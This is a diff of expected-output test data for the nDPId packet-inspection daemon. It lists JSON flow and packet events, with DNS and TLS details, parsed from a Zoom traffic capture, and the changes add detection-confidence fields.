+00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":280,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520471147,"flow_last_seen":1569520471188,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":92,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1569520471188,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfrn99mmr.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"109.94.160.99"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471189,"flow_last_seen":1569520471189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569520471189,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1569520471189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569520471189,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGatnAqAF1bV6gY9ZXAbsw+fmWAAAAALAC\/\/9csgAAAgQFtAEDAwUBAQgKJZziLAAAAAAEAgAA"}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1569520471220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1569520471220,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGd91tXqBjwKgBdQG71leHhddzMPn5l6ASqbBjhwAAAgQFrAQCCAp2KotLJZziLAEDAww="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1569520471220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569520471220,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGauXAqAF1bV6gY9ZXAbsw+fmXh4XXdIAQECwrtgAAAQEICiWc4kt2KotL"}
-00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520471189,"flow_last_seen":1569520471221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569520471221,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":286,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520471189,"flow_last_seen":1569520471255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569520471255,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01234{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":291,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520471189,"flow_last_seen":1569520471266,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"ts_msec":1569520471266,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}}
+00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520471189,"flow_last_seen":1569520471221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569520471221,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":286,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520471189,"flow_last_seen":1569520471255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569520471255,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01340{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":291,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520471189,"flow_last_seen":1569520471266,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"ts_msec":1569520471266,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}}
 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569520471399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"ts_msec":1569520471399,"pkt":"EBMx8Tl2KDc3AG3ICABFAABjAABAAEAGoUnAqAF1PpWYmdRFA+E5lpAkp\/QQcoAYEAA2VgAAAQEICiWc4viZh0dJFwMDACpAXTQxH2s8yyXvpDmREm16+\/VcNt\/x\/vlsIce1k7D8R+clMelpc+AJPCA="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":386,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471748,"flow_last_seen":1569520471748,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1569520471748,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1569520471748,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"ts_msec":1569520471748,"pkt":"EBMx8Tl2KDc3AG3ICABFAACHYY4AAEARSPnAqAF1bV6gY+PXImEAcwEfAQACfUZNNf\/9ojRJXQ1tO1HolgAAAAAAAAACAHoAKgB6ACoAAABADhc935YCXvuVxCQMI1O\/y\/Bgvpncu9jEece5cy1sdfpDYvCDXrg+TanGp+bzCbMeQN8Pa7V1aoQPcx2bwfanLQAAAAA="}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471748,"flow_last_seen":1569520471748,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1569520471748,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","ndpi": {"proto":"Zoom","breed":"Acceptable","category":"Video"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471748,"flow_last_seen":1569520471748,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1569520471748,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1569520471780,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1569520471780,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA\/ukJAADURu4xtXqBjwKgBdSJh49cAK4mJAgABfUZNNf\/9ojRJXQ1tO1HolgBaDj4AegAqAAAAAAAAAAA="}
 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1569520471780,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"ts_msec":1569520471780,"pkt":"KDc3AG3IEBMx8Tl2CABFAAApukNAADURu6FtXqBjwKgBdSJh49cAFe6ZAwAAAAF2Ko10AFoOPgAAAAAA"}
 00363{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":398,"source":"zoom.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1569520471784,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
 00166{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":398,"source":"zoom.pcap","alias":"nDPId-test","layer_type":34969}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471915,"flow_last_seen":1569520471915,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1569520471915,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":60620,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1569520471915,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"ts_msec":1569520471915,"pkt":"EBMx8Tl2KDc3AG3ICABFAACHOsEAAEARb8bAqAF1bV6gY+zMImEAcx+TAQACgEJ0mpHOZDa3wq7Yfnt8kAAAAAAAAAACAHoA0QB6ANEAAABAz+pIvn76v2yDYA2gAvW2g1TH36+BBcgmmBwGC4A2voI37csLDeuB1cbZ5dS3SDby7ZAjUH7\/6+f4krtKebNFkQAAAAA="}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471915,"flow_last_seen":1569520471915,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1569520471915,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":60620,"dst_port":8801,"l4_proto":"udp","ndpi": {"proto":"Zoom","breed":"Acceptable","category":"Video"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471915,"flow_last_seen":1569520471915,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1569520471915,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":60620,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1569520471939,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1569520471939,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA\/uqdAADURuydtXqBjwKgBdSJh7MwAK7AuAgABgEJ0mpHOZDa3wq7Yfnt8kABaDj8AegDRAAAAAAAAAAA="}
 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1569520471939,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"ts_msec":1569520471939,"pkt":"KDc3AG3IEBMx8Tl2CABFAAApuqhAADURuzxtXqBjwKgBdSJh7MwAFUSkAwAAAAF2Ko4UAFoOPwAAAAAA"}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":651,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520473084,"flow_last_seen":1569520473084,"flow_idle_time":180000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1569520473084,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":61731,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1569520473084,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"ts_msec":1569520473084,"pkt":"EBMx8Tl2KDc3AG3ICABFAACJ4\/YAAEARxo7AqAF1bV6gY\/EjImEAde5DAQACOkSxT2rBSy0CI5EJ7ghSoQAAAAAAAAACAHoFYgB6BWIAAABAyr1YPP8KZ34wUqB9PR5Zle\/sBvgfAfGBqNzDFPjrnryOYaOvAtAdhsk5Sd978V5OWjrnwByNSAVBXX+sDOwgiv\/\/\/\/8KAA=="}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520473084,"flow_last_seen":1569520473084,"flow_idle_time":180000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1569520473084,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":61731,"dst_port":8801,"l4_proto":"udp","ndpi": {"proto":"Zoom","breed":"Acceptable","category":"Video"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520473084,"flow_last_seen":1569520473084,"flow_idle_time":180000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1569520473084,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":61731,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1569520473116,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1569520473116,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA\/vWBAADURuG5tXqBjwKgBdSJh8SMAK0WqAgABOkSxT2rBSy0CI5EJ7ghSoQBaDkQAegViAAAAAAAAAAA="}
 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1569520473116,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"ts_msec":1569520473116,"pkt":"KDc3AG3IEBMx8Tl2CABFAAApvWFAADURuINtXqBjwKgBdSJh8SMAFalIAwAAAAF2KpKmAFoORAAAAAAA"}
-00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520469423,"flow_last_seen":1569520469433,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP.Zoom","breed":"Acceptable","category":"Network"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520469036,"flow_last_seen":1569520469072,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
-00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520469072,"flow_last_seen":1569520469072,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00590{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469081,"flow_last_seen":1569520469116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"13.225.84.182","src_port":54798,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520469423,"flow_last_seen":1569520469433,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520469036,"flow_last_seen":1569520469072,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00637{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520469072,"flow_last_seen":1569520469072,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
